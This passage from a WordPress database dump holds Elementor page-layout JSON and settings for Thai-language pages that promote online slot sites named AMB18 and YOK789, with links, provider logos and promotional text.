ploads\\/2026\\/02\\/Demo-play-slot-Banner-AMB18.webp\",\"id\":354,\"size\":\"\",\"alt\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/luca333auto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"button_text_color\":\"#FFFFFF\",\"hover_color\":\"#E6C300\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"hover_animation\":\"pulse-shrink\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\",\"link\":{\"url\":\"https:\\/\\/amb18b.com\\/promotion\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"hover_color\":\"#E9C500\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 AMB18 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 AMB18 \\u0e04\\u0e37\\u0e2d\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e2a\\u0e38\\u0e14\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e2d\\u0e40\\u0e22\\u0e48\\u0e19\\u0e15\\u0e4c \\u0e43\\u0e0a\\u0e49 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e20\\u0e32\\u0e1e\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e41\\u0e16\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e42\\u0e14\\u0e19\\u0e43\\u0e08\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e44\\u0e27 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e15\\u0e31\\u0e27\\u0e17\\u0e47\\u0e2d\\u0e1b\\u0e08\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e44\\u0e2b\\u0e19\\u0e01\\u0e47\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e22\\u0e39\\u0e2a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e27\\u0e49\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e22\\u0e2d\\u0e35\\u0e01\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e19\\u0e35\\u0e49\\u0e04\\u0e27\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e14\\u0e35 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e22\\u0e30\\u0e22\\u0e32\\u0e27<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG-1.webp\",\"id\":360,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming-1.webp\",\"id\":359,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI-1.webp\",\"id\":356,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo-1.webp\",\"id\":364,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic-1.webp\",\"id\":361,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2954,396,'_thumbnail_id','354'),(2957,16,'_elementor_controls_usage','a:6:{s:5:\"image\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:7;s:10:\"image_size\";i:7;s:7:\"link_to\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:6:{s:5:\"width\";i:1;s:27:\"background_hover_transition\";i:6;s:15:\"hover_animation\";i:6;s:19:\"image_border_radius\";i:6;s:32:\"image_box_shadow_box_shadow_type\";i:6;s:27:\"image_box_shadow_box_shadow\";i:6;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:10;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:10;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:27:\"background_hover_transition\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:1;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}}}s:6:\"button\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_button\";a:2:{s:4:\"text\";i:2;s:4:\"link\";i:2;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:8:{s:5:\"align\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:22:\"typography_font_weight\";i:2;s:15:\"hover_animation\";i:2;s:13:\"border_radius\";i:2;s:17:\"button_text_color\";i:1;s:11:\"hover_color\";i:2;}}s:8:\"advanced\";a:1:{s:15:\"section_effects\";a:2:{s:24:\"motion_fx_tilt_direction\";i:2;s:10:\"_animation\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:11:\"header_size\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:5:\"align\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}}}}'),(2960,345,'_wp_attachment_image_alt','ฝากถอนออโต้'),(2961,397,'_elementor_edit_mode','builder'),(2962,397,'_elementor_template_type','wp-page'),(2963,397,'_elementor_version','3.35.5'),(2964,397,'_elementor_pro_version','3.32.3'),(2965,397,'_wp_page_template','default'),(2966,397,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2967,397,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 <b>YOK789<\\/b> \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e2a\\u0e23\\u0e47\\u0e08\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e32\\u0e13\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21\\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 